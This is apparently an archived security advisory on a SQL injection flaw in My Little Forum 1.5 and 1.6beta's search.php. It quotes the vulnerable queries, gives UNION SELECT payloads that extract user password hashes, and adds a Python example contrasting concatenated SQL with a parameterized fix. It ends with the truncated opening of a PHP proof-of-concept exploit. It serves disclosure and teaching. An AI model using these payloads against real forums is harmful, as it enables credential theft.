My Little Forum search.php Remote SQL Injection Vulnerability
2008-04-09 04:16:07 Source: Internet
Published: 2005-09-23
Updated: 2005-09-23
Affected systems:
my little homepage My Little Forum 1.6beta
my little homepage My Little Forum 1.5
Description:
BUGTRAQ ID: 14908
My Little Forum is a simple web forum application.
My Little Forum contains a SQL injection vulnerability; an attacker who successfully exploits it can fully compromise the underlying database system.
At line 144 of search.php:
...
$result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".
$time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR, '".$lang['time_format']."')
AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
.$settings['search_results_per_page'], $connid);
...
Then, on the search page, select "phrase" and type:
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*
Because the $search_string variable is not filtered, an attacker can obtain any administrator's or user's password hash when magic quotes are turned off.
Version 1.6beta is also affected:
...
$result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL
".$time_difference." HOUR) AS Uhrzeit, subject, name, email, hp, place, text,
category FROM ".$db_settings['forum_table']." WHERE ".$search_string." ORDER BY tid
DESC, time ASC LIMIT ".$ul.", ".$settings['search_results_per_page'], $connid);
...
Dropping one column from the injection string (this query selects one column fewer than the 1.5 query) gives the same result:
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*
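The root cause in both queries above is that the search phrase is spliced into the SQL text, so a single quote ends the LIKE literal and everything after it runs as SQL. The following is an added example, not code from My Little Forum or from the advisory: it rebuilds the vulnerable query construction next to a hardened one in Python over an in-memory SQLite database so the difference can be run offline (the real forum is PHP on MySQL, where the equivalent fix is a mysqli or PDO prepared statement). The table layout, column set, sample rows and the hash placeholder are constructed assumptions; the payload is the advisory's, trimmed to six columns to match the sample table.

```python
import sqlite3

# Constructed in-memory schema loosely modelled on the advisory's forum table and
# forum_userdata table (columns and rows are assumptions, not the project's real
# schema); the stored "hash" is a placeholder string, not a real credential.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE forum (id INTEGER, pid INTEGER, tid INTEGER,
                            subject TEXT, name TEXT, text TEXT);
        CREATE TABLE forum_userdata (user_name TEXT, user_pw TEXT);
        INSERT INTO forum VALUES (1, 0, 1, 'Hello', 'alice', 'welcome to the forum');
        INSERT INTO forum VALUES (2, 1, 1, 'Re: Hello', 'bob', 'thanks, 100% agreed');
        INSERT INTO forum_userdata VALUES ('admin', 'PLACEHOLDER-HASH');
    """)
    return conn

COLUMNS = "id, pid, tid, subject, name, text"

# The advisory's payload with six user_pw columns, matching the six columns
# selected here (the 1.5 query needs twelve, the 1.6beta query eleven).
PAYLOAD = ("[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, "
           "user_pw FROM forum_userdata WHERE user_name='admin' /*")

def search_vulnerable(conn, phrase):
    """Mirrors search.php: the phrase is concatenated into the SQL text, so a
    quote inside it closes the LIKE literal and the remainder becomes SQL."""
    search_string = "text LIKE '%" + phrase + "%'"
    sql = ("SELECT " + COLUMNS + " FROM forum WHERE " + search_string +
           " ORDER BY tid DESC LIMIT 0, 20")
    return [row[5] for row in conn.execute(sql)]   # column 5 is 'text'

def escape_like(phrase):
    """Neutralise LIKE metacharacters so a '%' or '_' typed by the user matches
    itself; the escape character is declared with ESCAPE in the query."""
    return phrase.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def search_safe(conn, phrase):
    """Hardened form: the phrase travels as a bound parameter, never as SQL.
    Quotes, UNION and comment markers inside it are just characters to match,
    regardless of any magic_quotes-style global escaping."""
    sql = ("SELECT " + COLUMNS + " FROM forum WHERE text LIKE ? ESCAPE '\\'"
           " ORDER BY tid DESC LIMIT 0, 20")
    pattern = "%" + escape_like(phrase) + "%"
    return [row[5] for row in conn.execute(sql, (pattern,))]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload:", search_vulnerable(db, PAYLOAD))  # leaks the hash row
    print("hardened,   payload:", search_safe(db, PAYLOAD))        # []
    print("hardened,   '100%':", search_safe(db, "100%"))          # literal match only
```

Two points follow from running it. Binding the phrase removes the dependency on magic quotes that the advisory's attack relies on being off, because the database never parses user input as SQL. Escaping quotes alone would not be enough for a LIKE search: `%` and `_` are still wildcards inside the bound pattern, which is why the example escapes them and declares the escape character with ESCAPE.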
<* Source: rgod (rgod@autistici.org)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112741430006983&w=2
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!
# mlfexpl.php #
# #
# My Little Forum 1.5 ( possibly prior versions) SQL Injection / #
# MD5 password hash disclosure poc exploit with proxy support #
# #
# by rgod #
# site: http://rgod.altervista.org #
# #
# make these changes in php.ini if you have troubles #
# to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# usage: launch this script from Apache, fill requested fields, then... #
# dump all password hashes from database right now... #
# #
# Sun-Tzu: "You can be sure of succeeding in your attacks if you only attack #
# places which are undefended. You can ensure the safety of your defense if #
# you only hold positions that cannot be attacked." #
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<head><title>My Little Forum 1.5 SQL Injection </title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><style type="text/css"><!--
body,td,th { color: #00FF00;} body { background-color: #000000;} .Stile5 {
font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px;} .Stile6{
font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-style: italic; } --> </style></head> <body> <p class="Stile6"> My Little Forum 1